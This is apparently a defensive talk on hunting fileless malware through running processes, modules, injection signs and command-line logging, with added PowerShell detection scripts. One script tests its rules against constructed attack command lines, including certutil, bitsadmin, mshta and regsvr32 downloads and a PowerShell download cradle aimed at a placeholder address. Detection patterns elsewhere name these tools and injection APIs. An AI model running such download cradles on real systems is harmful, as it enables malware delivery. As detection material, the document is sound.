You need a PROcess to check your
running processes and modules.
The bad guys, and red teams are
coming after them!
Michael Gough – Principal NCC Group
Founder MalwareArchaeology.com
& IMFSecurity.com
MalwareArchaeology.com
Who am I
• Blue Team Defender Ninja, Malware Archaeologist, Logoholic and Principal Incident Response Engineer for NCC Group
• I love “properly” configured logs – they tell us Who, What, Where,
When and hopefully How
Creator of
“Windows Logging Cheat Sheet”
“Windows File Auditing Cheat Sheet”
“Windows Registry Auditing Cheat Sheet”
“Windows Splunk Logging Cheat Sheet”
“Windows ATT&CK Logging Cheat Sheet”
“ARTHIR – ATT&CK Remote Threat Hunting Incident Response tool”
• Co-Creator of “Log-MD” – Log Malicious Discovery Tool
• And co-host of “THE Incident Response Podcast”
Why this talk?
Because these can’t tell you enough
Or this
Fileless, in-memory-only malware
• To address this expanding threat, which is becoming more and more common
– Too common
• Commodity malware, Red Team engagements, and of course APT attackers use it
• This method can avoid many security tools, because there is no file on disk for them to scan
Let’s rethink or redefine Fileless Malware
Marketing - Scareware
• I get it, saying “Fileless” is an easy way to sum up a threat so that management, sales, products, etc. can understand a new type of threat
• But for those of us having to deal with it from an IR or Forensik perspective, we need more than just the word “fileless”
• So let’s take a look at another, more detailed way to look at fileless malware that immediately tells us something about where it lives, and how to go about looking for it
https://conference.forensik.ca/
Rethinking Fileless Malware
• Fileless Malware that can only be found in the memory of a running system (Malware + Memory = Memware)
• No files can be found if you scan the disk while the system is running
– Or they are very short lived, just long enough to load (bypasses FIM)
• Typical infection vectors are:
– Injection
– DLL side-loading/hijacking
– Process hollowing
– Download source code and compile on the fly (.NET csc.exe, jsc.exe)
– User double-click, etc.
• “Fileless” malware: the file lives somewhere, so let’s do a better job guiding people where to look for signs of it
Other Fileless Malware types
• Regware – Malware payload is stored in the registry, with an autorun/ASEP that calls and loads it into memory (Malware + Payload in Registry = RegWare)
• WMIware – Malware payload is stored in the WMI database, with an autorun/ASEP that calls and loads it into memory (Malware + Payload in WMI database = WMIWare)
• PowerShellware – Malware payload is in the form of PowerShell scripts, downloaded or stored somewhere on the fly, with an autorun/ASEP that calls and loads it into memory (Malware + Payload in PowerShell = PowerShellWare)
• Compileware – Malware payload is not yet compiled, stored anywhere, with an autorun/ASEP that calls, compiles and loads it into memory (Malware + Payload compiled on the fly = CompileWare)
• Downloadware – Autorun/ASEP calls out to the Internet to download the malware payload or source code, which is then compiled and loaded into memory (Malware + Payload downloaded each time = DownloadWare), maybe LOLBaSWare ;-)
Autoruns/ASEP
• Keep in mind…
– Not all malware will have an autorun/ASEP
• Latest TrickBot on Domain Controllers
• Especially the Red Team, which doesn’t like to leave IOCs
– Or the autorun is created on shutdown, then deleted on startup once the malware loads
• Nothing found when doing live triage/analysis (Dridex)
– So what is in memory may be all that we can see
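The Regware and WMIware cases above are the ones you can hunt without a memory dump, because the loader has to sit in an ASEP somewhere. This is an added example of my own, not LOG-MD and not code from the talk: it walks the common Run/RunOnce keys and flags values that look like stored or encoded payloads, then lists permanent WMI event subscriptions with their inline command or script. The key list, the regexes and the 1024-byte threshold are assumptions for this example; the tool's own checks are broader. Run it in an elevated PowerShell session on the host.

```powershell
# Added example, not LOG-MD: hunt Regware (payload in a Run key value) and
# WMIware (payload in a permanent WMI event subscription) on a live host.
# Key list, regexes and the 1024-byte threshold are assumptions for this example.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Why an ASEP value deserves a look: the payload itself is in the value (Regware),
# or the value is just a script host pulling the payload from memory/registry/web.
function Test-SuspiciousAutorun {
    param([string]$Value)
    if ($Value.Length -gt 1024) { return 'oversized value: payload may be stored in the registry' }
    if ($Value -match '^[A-Za-z0-9+/=]{200,}$') { return 'bare base64 blob' }
    if ($Value -match '\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b' -and
        $Value -match '(-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}|javascript:|vbscript:|FromBase64String|Invoke-Expression|\bIEX\b|DownloadString|Get-ItemProperty|https?://)') {
        return 'script host launching an encoded, registry-stored or remote payload'
    }
    return $null
}

function Get-SuspiciousAutoruns {
    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $item = Get-Item -Path $key
        foreach ($name in $item.GetValueNames()) {
            $val = [string]$item.GetValue($name)
            $why = Test-SuspiciousAutorun -Value $val
            if ($why) {
                [pscustomobject]@{
                    Key     = $key; Name = $name; Reason = $why
                    Preview = $val.Substring(0, [Math]::Min(120, $val.Length))
                }
            }
        }
    }
}

# WMIware: a permanent event subscription is filter + consumer + binding in
# root\subscription. CommandLineEventConsumer / ActiveScriptEventConsumer carry
# the payload inline, so there is no file and no Run key to find.
function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter   -ErrorAction SilentlyContinue)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
    foreach ($b in $bindings) {
        # Reference properties come back as a CimInstance (key properties only) or,
        # from older providers, as a path string like __EventFilter.Name="x"; handle both.
        $fName = if ($b.Filter   -is [string]) { ($b.Filter   -split '"')[1] } else { $b.Filter.Name }
        $cName = if ($b.Consumer -is [string]) { ($b.Consumer -split '"')[1] } else { $b.Consumer.Name }
        $f = $filters   | Where-Object { $_.Name -eq $fName }
        $c = $consumers | Where-Object { $_.Name -eq $cName }
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } elseif ($c.ScriptText) { $c.ScriptText } else { '' }
        [pscustomobject]@{
            Filter   = $fName
            Query    = $f.Query
            Consumer = $cName
            Type     = $c.CimClass.CimClassName
            Payload  = $payload
        }
    }
}

Get-SuspiciousAutoruns | Format-List
Get-WmiPersistence     | Format-List
```

Any binding at all in root\subscription is worth reading on a workstation; servers often have a handful of legitimate ones (backup and monitoring agents), so baseline them by filter query and consumer type rather than by name, which the attacker picks.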
Latest TrickBot
Palo Alto Unit 42 - https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/
So how do we find this stuff?
MITRE ATT&CK
• First - Everything you do should be mapped to MITRE ATT&CK - https://attack.mitre.org/
• Some of the techniques used
– T1500 – Compile After Delivery (now sub-technique T1027.004)
– T1127 – Trusted Developer Utilities Proxy Execution
– T1055 – Process Injection
– T1196 – Control Panel Items (now sub-technique T1218.002, Control Panel)
– etc.
• Sub-techniques are here !!!
MITRE ATT&CK – Sub-techniques
• T1574 – Hijack Execution Flow
– 11 sub-techniques
– T1574.002 – DLL Side-Loading is just one of them
• T1055 – Process Injection
– 11 sub-techniques
– T1055.002 – Portable Executable Injection
We need a PROcess
• We need to create a PROcess to start looking for this condition
• Tools are just not preventing this technique
• We need to build this PROcess into our hourly/daily/weekly/monthly routines to detect and alert on this technique
• We need to build this PROcess into our daily/weekly/monthly/yearly routines to Threat Hunt for this technique
Canadian Andrew Hay
Two basic ways
1. Dump memory and analyze the memory dump
– Use a tool like Volatility and all the plug-ins
2. Check running processes and their modules for signs of additional (DLL) or injected code
– Use a tool like LOG-MD-Premium to scan a live system for modifications to running processes and their modules
Finding Memware
• Traditional forensics has us dumping a memory image and running tools like Volatility against it
• Logs can contain a lot of details that can alert you to this behavior, IF you collect, THEN detect OR hunt
– Process command line is KEY to catching these attacks
• Checking running processes and their modules on a live system is a GREAT option
– Better yet, look for signs of injection !!
• Look for the other artifacts: autorun/ASEP, registry keys storing scripts and/or payloads, WMI databases storing scripts and/or payloads, and odd PowerShell (large blocks, obfuscation, etc.)
Signs of Injection
• What does this look like?
• A running process shows signs of additional or replaced code
• This condition is detectable by a few tools
• And it is an obvious indicator of something bad
• Yes, some system drivers and other legitimate software will show up here too, so baseline what is normal
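As an added example (my own code, not LOG-MD-Premium or anything from the slides) of what the second approach, checking live processes and their modules, looks like in PowerShell: for every process it lists modules whose file is gone from disk or is unsigned outside the Windows and Program Files trees, and walks the process's address space with VirtualQueryEx for committed private memory that is both writable and executable, the memory shape that injected shellcode and reflectively loaded PEs normally have. Run it elevated; the trusted-root list and the choice of indicators are assumptions, and .NET, browsers and packed software will produce RWX hits that need baselining, just as the slide warns about system drivers.

```powershell
# Added example, not LOG-MD: a minimal "PROcess" check of running processes,
# their modules, and one cheap sign of injection (private RWX memory).
# Run elevated. Protected processes and 32/64-bit mismatches are skipped.
# The trusted-root list and what counts as a finding are my assumptions.

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class MemScan {
    [StructLayout(LayoutKind.Sequential)]
    public struct MBI {   // MEMORY_BASIC_INFORMATION
        public IntPtr BaseAddress; public IntPtr AllocationBase; public uint AllocationProtect;
        public IntPtr RegionSize;  public uint State; public uint Protect; public uint Type;
    }
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualQueryEx(IntPtr h, IntPtr addr, out MBI mbi, IntPtr len);
    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr h);
}
"@

$MEM_COMMIT = 0x1000; $MEM_PRIVATE = 0x20000
$RWX_MASK   = 0x40 -bor 0x80          # PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
$PROCESS_QUERY_INFORMATION = 0x0400

# Walk the address space and return committed, private, RWX regions. Shellcode
# and reflectively loaded PEs usually live in exactly this kind of memory; .NET
# JIT, browsers and some packers create it legitimately, so a hit means "look
# closer" (dump the region, check strings), not "bad".
function Get-RwxPrivateRegions {
    param([int]$ProcessId)
    $h = [MemScan]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) { return @() }     # access denied / protected process
    $hits = @(); $addr = [IntPtr]::Zero; $mbi = New-Object MemScan+MBI
    $len  = [IntPtr][System.Runtime.InteropServices.Marshal]::SizeOf([type][MemScan+MBI])
    try {
        while ([MemScan]::VirtualQueryEx($h, $addr, [ref]$mbi, $len) -ne [IntPtr]::Zero) {
            if ($mbi.State -eq $MEM_COMMIT -and $mbi.Type -eq $MEM_PRIVATE -and ($mbi.Protect -band $RWX_MASK)) {
                $hits += ('0x{0:X} {1} KB' -f $mbi.BaseAddress.ToInt64(), [int]($mbi.RegionSize.ToInt64() / 1KB))
            }
            $next = $mbi.BaseAddress.ToInt64() + $mbi.RegionSize.ToInt64()
            if ($next -le $addr.ToInt64()) { break }  # wrapped: end of user address space
            $addr = [IntPtr]$next
        }
    } finally { [void][MemScan]::CloseHandle($h) }
    return $hits
}

$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") | Where-Object { $_.Length -gt 1 }

# Per-module checks: still on disk (short-lived loaders delete the file after it
# is mapped), Authenticode-signed, and living under a trusted root. Signature
# results are cached per path because the same DLLs load into many processes.
function Get-ModuleFindings {
    param([System.Diagnostics.Process]$Process, [hashtable]$SigCache)
    $findings = @()
    try { $modules = @($Process.Modules) } catch { return $findings }   # bitness mismatch or access denied
    foreach ($m in $modules) {
        $path = $m.FileName
        if (-not (Test-Path -LiteralPath $path)) { $findings += "module no longer on disk: $path"; continue }
        $trusted = $false
        foreach ($root in $trustedRoots) {
            if ($path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $trusted = $true }
        }
        if (-not $SigCache.ContainsKey($path)) { $SigCache[$path] = (Get-AuthenticodeSignature -FilePath $path).Status }
        if (-not $trusted -and $SigCache[$path] -ne 'Valid') {
            $findings += "unsigned module outside trusted paths: $path ($($SigCache[$path]))"
        }
    }
    return $findings
}

function Invoke-ProcessCheck {
    $sigCache = @{}
    foreach ($p in Get-Process) {
        $f   = @(Get-ModuleFindings -Process $p -SigCache $sigCache)
        $rwx = @(Get-RwxPrivateRegions -ProcessId $p.Id)
        if ($rwx.Count) { $f += 'private RWX regions: ' + ($rwx -join ', ') }
        if ($f.Count) {
            [pscustomobject]@{ PID = $p.Id; Name = $p.ProcessName; Path = $p.Path; Findings = $f }
        }
    }
}

Invoke-ProcessCheck | Format-List
```

On a clean workstation expect a short list dominated by .NET hosts and the browser; anything else with RWX private memory, and any module that is no longer on disk, is what the talk means by a sign of injection and is the process to dump and run through static analysis.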
Example LOG-MD-Premium
• -proc  Check running processes & modules
• -md  Exclude known good processes UNLESS there are signs of injection
• -i  List processes with signs of injection
• -b9  Statically evaluate the file to determine malicious likelihood and dump strings
• -vt  Look up the hashes of the modules for any indications of known bad
• -x  Dump all files that show signs of injection
Example LOG-MD-Premium
B9 module static file evaluation
• "B9 Result": "'Bad.exe' is likely suspicious"
• "Name": "Bad.exe",
• "Size": "218624",
• "MD5": "c4f3974b6eda003b0fa3ac230b24dd49",
• "SHA1": "a9a8c1123bb8dc4dbd0ea9635792b7f3c9462e38",
• "SHA256": "7218ad69dfae486e8ceba58d732ff91c0dbfe2615a14ed32e2addcb9aa660157",
• "SHA512": "5ae8c1e2895e794857e6a346cc7a3ca5358718c560b5f0090de35a6cbaeb927fc9cfdfc09ad86a10fb3414a966485bb68ddcce22103e7e153fef5584527b7538",
• "CRC32": "ea619216",
• "SSDEEP": "3072|pQ0n3fFiFjwk5vl8E5cYkx9psaiNcJNuyJZfb5N/z4n6feAg0FujGV8umEmDP0|/MFswtDqdOamiNudAOlymz",
• "PDB Path": "",
• "VSInfo": "1",
• "Entropy": "6.576878",
• "FilePacker": "No matches found.",
• "Imphash": "2f0d6f69089f07b10ab46e6a615c6fd4",
• "Certificates": "None found.",
• "B9 Result": "'Bad.exe' is likely suspicious."
Examples
• Kovter injects into SvcHost 32bit
• Qakbot
• Dridex
Dumping/Extracting Files
• If you use a tool to extract or dump files from memory to disk, you can statically evaluate them
• Look up the hashes in an API like VirusTotal
• Evaluate the makeup of the file to determine Good, Suspicious, or Malicious indicators
• Extract strings
• Reverse the files if needed
Dumping/Extracting Files
• You can use a memory dump and Volatility to extract files, DLLs, and drivers (Volatility 2 plugins dumpfiles, dlldump and moddump, each with a --dump-dir)
– dumpfiles --dump-dir=VolatilityFiles
– dlldump --dump-dir=VolatilityDlls
– moddump --dump-dir=VolatilityDrivers
• You can use LOG-MD-Premium to extract files
– LOG-MD-Premium -proc -md -i -x
Extracted Files LOG-MD & Volatility
• QakBot
• Kovter
• Dridex
• Evaluated with LOG-MD B9 module
Details of the files
• You can look for simple indicators
• Is it signed?
• Metadata - actual filename vs. the Internal and Original filename in the version info
• Is it packed?
• Hash lookups to an API
• File upload to an API
• Determine the makeup of the file for Likely “Good”, “Suspicious”, or “Malicious”
Downloadware Examples
• They can call out to the Internet to download the code to compile, or fetch the malware, so it does not live on disk. Some examples:
– CobaltStrike and SCYTHE custom malware packages
– LOLBins/LOLBaS – Rundll32, Regsvr32, Regasm, etc.
• https://github.com/LOLBAS-Project/LOLBAS
– Compilers - Csc.exe, MSBuild.exe, JSC.exe, etc.
– May write to disk on shutdown, delete on startup
CSC.exe example
• PowerShell Add-Type (and other compile-on-the-fly .NET tricks) drops two short-lived files in the user’s temp folder and runs the C# compiler against them:
• <random>.cs – the source
• <random>.cmdline – the response file holding the compiler arguments
• Csc.exe /noconfig /fullpaths @<random>.cmdline
• https://blog.didierstevens.com/2019/10/15/powershell-add-type-csc-exe/
Why Running Processes
• SPEED
• It is a far faster and more scalable option to scan a system LIVE for running processes and their modules
• Dumping memory takes time
• Determining the profile (imageinfo) takes a LONG time
• Running all the plugins takes time
Control Panel Applets
• .CPL files are all those Control Panel applets; a .cpl is just a DLL with a CPlApplet export
– Rundll32 shell32.dll,Control_RunDLL C:\<whateverdir>\Fakejava.cpl (what control.exe does under the hood)
• Launches a bad DLL into memory - LOLBin
• .cpl files load all the time, so it’s noisy
• 3rd party applets are not well signed
• Many EDRs do not alert on this method
• The Red Team LOVES this method - CobaltStrike
Control Panel Applets
• This is probably the #1 Red Team attack method
– LOLBin (Control.exe and RunDll32.exe)
• HARD to detect due to normal noise
• EDR is poor at this method
• So how do you catch this highly used and successful method?
Catching Control Panel Applets
• Log process creation (Event ID 4688 with the command line, or Sysmon Event ID 1)
• Look for .cpl files and/or Control.exe and/or RunDll32.exe in the command line
• Baseline what is normal
• Create a PROcess
• Paths may look just like the normal ones, so match on the full path and file, not just the image name
• Statically analyze these .cpl files, whatever their extension (a renamed .cpl still loads)
LOLBin/LOLBaS
• Oddvar Moe - https://lolbas-project.github.io/
• Listen to our podcast on the subject
NIX PRO Tip
• It is easy for NIX rootkits to hide things
• But there is a /proc directory, with one /proc/<pid> entry per process
• A rootkit that hooks directory listing can hide a /proc/<pid> entry from ll or ls -l, but the directory is usually still there if you ask for it by name
• So record what ls shows, then probe every possible PID directly and look at the exe link of any PID that ls did not list
– ls -al /proc | awk '{print $9}' | grep -E '^[0-9]+$' | sort -n > proc-list.txt
– for i in $(seq 1 "$(cat /proc/sys/kernel/pid_max)"); do if test -d /proc/$i; then if ! grep -q "^$i$" proc-list.txt; then ls -al /proc/$i/exe; fi; fi; done | grep "root" | grep -v -f known_good_proc.txt > odd_proc.txt
• known_good_proc.txt is your baseline of expected root-owned exe paths, one per line; grep "root" keeps only root-owned processes, drop it to see everything. pid_max is read from the kernel because it can be far above 40000 on 64-bit hosts
Monitoring for and Threat Hunting
Monitor for & Threat Hunting
• We need to develop a PROcess to monitor/detect for and/or Threat Hunt for signs of these techniques
• Step 1
– Enable the data (enable the logging)
– Configure logs per the Windows Logging Cheat Sheet(s)
– Enable ‘Include command line in process creation events’ so Event ID 4688 carries the process command line
• Step 2
– Create detections for many of these techniques
– Process command line is KEY.. it’s in the parameters
Monitor for & Threat Hunting
Step 3
• Come up with a PROcess to scan running processes and their loaded modules
– Detect these memory-only infections
– This should be both for regular detection and for Threat Hunting
– Watch for indications of injection
Static eval files for Strings
• You can eval files for known strings that may indicate injection
• The LOG-MD-Premium B9 module not only looks at the structure of the file to determine likely “Good”, “Suspicious”, or “Malicious”
• But also dumps strings to allow eval of the existence of strings that further indicate the file is malicious
Example LOG-MD-Premium
B9 static file evaluation - Strings
• "B9Words":" List of words in file.",
• "!This program cannot be run in DOS mode."
• "JtRich"
• ".text"
• "`.rdata"
• "@.data"
• ".gfids"
• "GetProcessHeap"
• "FindClose"
• "FindFirstFileExA"
• "FindNextFileA"
• "IsValidCodePage"
• "GetCommandLineA"
• "GetCommandLineW"
• "GetEnvironmentStringsW"
• "FreeEnvironmentStringsW"
• "SetStdHandle"
• "WriteConsoleW"
• "ReadConsoleW"
• "CreateFileW"
• "HeapSize"
• "SetEndOfFile"
• "_CorDllMain"
• "mscoree.dll"
• "Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED."
"string too long"
"invalid string position"
"bad allocation"
"identifier removed"
"illegal byte sequence"
"interrupted"
"invalid argument"
"io error"
"is a directory"
"message size"
"network down"
"network reset"
"network unreachable"
"no buffer space"
"no child process"
"no link"
"no lock available"
"no message available"
"no message"
"no protocol option"
"no space on device"
"no stream resources"
"no such device or address"
"no such device"
"no such file or directory"
"no such process"
"not a directory"
"not a socket"
"not a stream"
"not connected"
"not enough memory"
Monitor for & Threat Hunting
Strings
• Maybe a PROcess to scan strings for API calls such as:
– OpenProcess
– VirtualAlloc
– VirtualAllocEx
– WriteProcessMemory
– LoadLibrary
– LoadLibraryA
– CreateRemoteThread
– ResumeThread
– ReflectiveLoader()
– GetProcAddress
– CreateProcess
– ZwUnmapViewOfSection
– NtUnmapViewOfSection
– GetThreadContext
– SetThreadContext
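One way to do the “Details of the files” checks and the API-string scan above on a file dumped from memory, as an added example that is my own and not LOG-MD’s B9 module: it hashes the file, checks the Authenticode signature, compares the on-disk name with the version-info OriginalFilename, computes byte entropy as a packing indicator, pulls ASCII and UTF-16 strings, and matches them against the injection API list. The verdict thresholds and the extra APIs I added to the list (VirtualProtect, NtCreateThreadEx, QueueUserAPC) are assumptions.

```powershell
# Added example, not LOG-MD's B9 module: static triage of an extracted file.
# Scoring thresholds and the extended API list are my assumptions.

$injectionApis = @(
    'OpenProcess','VirtualAlloc','VirtualAllocEx','VirtualProtect','WriteProcessMemory',
    'LoadLibraryA','LoadLibraryW','GetProcAddress','CreateRemoteThread','NtCreateThreadEx',
    'ResumeThread','GetThreadContext','SetThreadContext','NtUnmapViewOfSection',
    'ZwUnmapViewOfSection','QueueUserAPC','ReflectiveLoader','CreateProcessA','CreateProcessW'
)

# Shannon entropy in bits per byte: packed or encrypted payloads sit near 7.5-8.0,
# plain compiled code usually well below 7.
function Get-Entropy {
    param([byte[]]$Bytes)
    if ($Bytes.Length -eq 0) { return 0.0 }
    $counts = New-Object int[] 256
    foreach ($b in $Bytes) { $counts[$b]++ }
    $h = 0.0
    foreach ($c in $counts) {
        if ($c -gt 0) { $p = $c / $Bytes.Length; $h -= $p * [Math]::Log($p, 2) }
    }
    return [Math]::Round($h, 4)
}

# Printable ASCII runs and UTF-16LE runs of at least $MinLen characters.
# Latin-1 decoding maps bytes 1:1 so the regex can reject anything above 0x7E.
function Get-Strings {
    param([byte[]]$Bytes, [int]$MinLen = 5)
    $latin1 = [System.Text.Encoding]::GetEncoding(28591).GetString($Bytes)
    $wide   = [System.Text.Encoding]::Unicode.GetString($Bytes)
    $re = "[\x20-\x7e]{$MinLen,}"
    @([regex]::Matches($latin1, $re) | ForEach-Object Value) + @([regex]::Matches($wide, $re) | ForEach-Object Value)
}

function Invoke-FileTriage {
    param([string]$Path)
    $bytes   = [System.IO.File]::ReadAllBytes($Path)
    $item    = Get-Item -LiteralPath $Path
    $sig     = Get-AuthenticodeSignature -FilePath $Path
    $vi      = $item.VersionInfo
    $strings = Get-Strings -Bytes $bytes
    $apis    = @($injectionApis | Where-Object { $strings -contains $_ })
    $entropy = Get-Entropy -Bytes $bytes
    $isPE    = $bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A   # "MZ"

    $reasons = @()
    if ($isPE -and $sig.Status -ne 'Valid') { $reasons += "unsigned or bad signature ($($sig.Status))" }
    if ($vi.OriginalFilename -and $vi.OriginalFilename -ne $item.Name) {
        $reasons += "name mismatch: on disk '$($item.Name)', OriginalFilename '$($vi.OriginalFilename)'"
    }
    if ($entropy -ge 7.2) { $reasons += "high entropy $entropy (packed or encrypted?)" }
    if ($apis.Count -ge 4) { $reasons += "injection API set: $($apis -join ', ')" }
    $verdict = if ($reasons.Count -ge 3) { 'Likely Malicious' } elseif ($reasons.Count -ge 1) { 'Suspicious' } else { 'Likely Good' }

    [pscustomobject]@{
        Name             = $item.Name
        Size             = $item.Length
        MD5              = (Get-FileHash -LiteralPath $Path -Algorithm MD5).Hash
        SHA256           = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
        Signed           = $sig.Status
        OriginalFilename = $vi.OriginalFilename
        Entropy          = $entropy
        InjectionApis    = $apis
        Verdict          = $verdict
        Reasons          = $reasons
    }
}

# Usage: Invoke-FileTriage -Path C:\Cases\extracted\Bad.exe | Format-List
```

A packed sample will show almost none of these APIs as strings because they are resolved at runtime, so a high-entropy file whose visible imports are little more than LoadLibrary, GetProcAddress and VirtualAlloc is itself the tell; dump it from memory after it unpacks and triage the dump instead.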
Watch for Downloading
LOLBin/LOLBaS
• Malicious code has to be downloaded from somewhere
• Advanced attackers and Red Teams will use LOLBins and the LOLBaS scripts to download the payload
• Alert on these
• Baseline the normal, there will NOT be many
• Watch these executions closely
LOLBINS/LOLBAS that can download
• powershell.exe
• bitsadmin.exe
• certutil.exe
• psexec.exe
• wmic.exe
• mshta.exe
• mofcomp.exe
• cmstp.exe
• windbg.exe
• cdb.exe
• msbuild.exe
• csc.exe
• regsvr32.exe
• Excel too !!!
Short list per Cisco Talos
• mshta.exe
• certutil.exe
• bitsadmin.exe
• regsvr32.exe
• powershell.exe
https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html
Process Command Line is KEY
Map to MITRE ATT&CK
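The Control Panel applet slides and the downloading LOLBin list above come down to the same detection: a rule set over the process command line, with a baseline for the legitimate noise. This added example, mine rather than the talk’s, runs such rules over constructed sample command lines so it can be tried offline; the rule names, regexes, ATT&CK mappings and the baseline entry are assumptions to tune against your own 4688/Sysmon data, and the sample lines and the 198.51.100.10 address are made up.

```powershell
# Added example, not from the talk: command-line rules for the .cpl trick and
# the downloading LOLBins, with a baseline. Rules, mappings and samples are mine.

$rules = @(
    @{ Name = 'rundll32 Control_RunDLL';          Attack = 'T1218.002'; Pattern = 'rundll32.*shell32\.dll,\s*Control_RunDLL' },
    @{ Name = 'cpl launched by control/rundll32'; Attack = 'T1218.002'; Pattern = '\b(control|rundll32)(\.exe)?\b.*\.cpl\b' },
    @{ Name = 'certutil download/decode';         Attack = 'T1105';     Pattern = '\bcertutil(\.exe)?\b.*(-urlcache|-verifyctl|-decode)' },
    @{ Name = 'bitsadmin transfer';               Attack = 'T1197';     Pattern = '\bbitsadmin(\.exe)?\b.*/transfer' },
    @{ Name = 'mshta remote or inline script';    Attack = 'T1218.005'; Pattern = '\bmshta(\.exe)?\b.*(https?:|javascript:|vbscript:)' },
    @{ Name = 'regsvr32 scriptlet';               Attack = 'T1218.010'; Pattern = '\bregsvr32(\.exe)?\b.*(/i:https?:|scrobj\.dll)' },
    @{ Name = 'powershell download cradle';       Attack = 'T1059.001'; Pattern = '\b(powershell|pwsh)(\.exe)?\b.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Net\.WebClient)' },
    @{ Name = 'powershell encoded command';       Attack = 'T1059.001'; Pattern = '\b(powershell|pwsh)(\.exe)?\b.*\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' },
    @{ Name = 'csc compile after delivery';       Attack = 'T1027.004'; Pattern = '\bcsc(\.exe)?\b.*@.*\.cmdline' },
    @{ Name = 'msbuild project execution';        Attack = 'T1127.001'; Pattern = '\bmsbuild(\.exe)?\b.*\.(xml|csproj|proj)\b' }
)

# Emits one object per matching rule; emits nothing if the line is baselined.
function Test-CommandLine {
    param([string]$CommandLine, [string[]]$Baseline = @())
    foreach ($ok in $Baseline) { if ($CommandLine -match $ok) { return } }
    foreach ($r in $rules) {
        if ($CommandLine -match $r.Pattern) {
            [pscustomobject]@{ Rule = $r.Name; Attack = $r.Attack; CommandLine = $CommandLine }
        }
    }
}

# Constructed samples (not real captures); 198.51.100.0/24 is documentation space.
$samples = @(
    'rundll32.exe shell32.dll,Control_RunDLL C:\Users\bob\AppData\Local\Temp\Fakejava.cpl',
    'control.exe C:\Windows\System32\inetcpl.cpl',
    'certutil.exe -urlcache -split -f http://198.51.100.10/a.txt C:\Users\Public\a.txt',
    'bitsadmin.exe /transfer job /download /priority high http://198.51.100.10/x.dat C:\Users\Public\x.dat',
    'mshta.exe http://198.51.100.10/a.hta',
    'regsvr32.exe /s /n /u /i:http://198.51.100.10/a.sct scrobj.dll',
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://198.51.100.10/p'')"',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /noconfig /fullpaths @"C:\Users\bob\AppData\Local\Temp\abcd.cmdline"',
    'notepad.exe C:\Users\bob\notes.txt'
)

# Baseline: .cpl launches straight from System32 are the normal noise on this box.
$baseline = @('^control(\.exe)?\s+C:\\Windows\\System32\\[a-z0-9]+\.cpl$')

$samples | ForEach-Object { Test-CommandLine -CommandLine $_ -Baseline $baseline } |
    Format-Table Rule, Attack, CommandLine -AutoSize

# Live use: Security 4688 with "Include command line in process creation events"
# enabled (or Sysmon Event ID 1). CommandLine is pulled from EventData by name so
# the field index does not matter.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } | ForEach-Object {
#     $cl = ([xml]$_.ToXml()).Event.EventData.Data | Where-Object { $_.Name -eq 'CommandLine' }
#     Test-CommandLine -CommandLine $cl.'#text' -Baseline $baseline
# }
```

The csc.exe rule will also fire on every legitimate PowerShell Add-Type, which is exactly the point of the slide: baseline it by parent process and by who runs it, rather than turning the rule off.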
NIX LOLBins - GTFObins
• https://gtfobins.github.io/
Best options for PROcess tools
• Log Management is your BEST friend here
– If you have, and can afford to put, agents on all your endpoints and collect the needed data
• If not, then you will need a PROcess to manually check running processes, their modules and signs of injection
• LOG-MD-Premium, Sysinternals, Sysmon (Event ID 8 CreateRemoteThread & 10 ProcessAccess), using WinRM and ARTHIR, or a memory dump with Volatility are possible options
Conclusion
• Create a PROcess to look at running processes
and their modules
• Look for signs of injection
• Log the process command line execution
• Watch the LOLBaS utilities
• Monitor for the executions discussed in this
presentation
Some tools to consider
Please let me know of any others
• LOG-MD-Premium
– Running Processes and Modules, Injection, and B9 static file analysis
• Volatility
– https://www.volatilityfoundation.org/
– HollowFind plugin (Win 10 compatible?)
• https://github.com/monnappa22/HollowFind
• PE-sieve (open source)
– https://github.com/hasherezade/pe-sieve
• Get-InjectedThread.ps1
– https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
• PSReflect
– https://github.com/mattifestation/PSReflect
Some tools to consider
Please let me know of any others
• GRR
– https://github.com/google/grr
• Rekall
– http://www.rekall-forensic.com/home
• InVtero
– https://github.com/ShaneK2/inVtero.net
– https://github.com/seancomeau/inVtero.net
• MemHunter (Old, requires .NET 3.5)
